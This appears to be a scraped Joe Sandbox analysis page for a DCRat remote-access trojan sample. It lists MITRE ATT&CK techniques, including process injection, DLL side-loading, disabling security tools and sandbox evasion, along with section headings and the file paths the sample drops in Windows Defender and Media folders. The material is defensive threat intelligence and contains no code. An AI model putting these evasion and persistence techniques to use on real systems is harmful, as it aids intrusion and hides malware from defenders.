Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QT4aLb3P98.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3

C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe

C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QT4aLb3P98.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wRRcPdViqk.exe.log

C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat

C:\Users\user\AppData\Local\Temp\wLOamAKQX5

C:\Windows\Media\Sonata\62cf92e5da7ec3

C:\Windows\Media\Sonata\wRRcPdViqk.exe

C:\Windows\Media\Sonata\wRRcPdViqk.exe:Zone.Identifier

\Device\Null

Static File Info

General

File Icon

Windows Analysis Report
QT4aLb3P98.exe